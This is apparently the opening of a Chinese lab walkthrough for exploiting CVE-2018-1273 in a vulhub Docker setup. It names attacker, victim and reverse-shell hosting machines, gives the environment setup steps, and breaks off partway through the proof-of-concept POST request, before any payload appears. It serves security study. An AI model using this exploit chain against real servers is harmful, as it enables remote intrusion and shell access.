环境准备
作者采用的是搭配是:
一台攻击机(kali-2021)192.168.141.190
受害机(vulhub搭建的)192.168.141.194
一台用来下载反弹shell脚本的服务器(内网,如果有服务器更好)192.168.141.128
攻击流程
vulhub环境搭建
找到cve-2018-1273文件夹,通过"docker-compose build"和"docker-compose up -d"拉取环境,
之后访问服务器ip:8080/users看环境是否成功
构造poc
POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: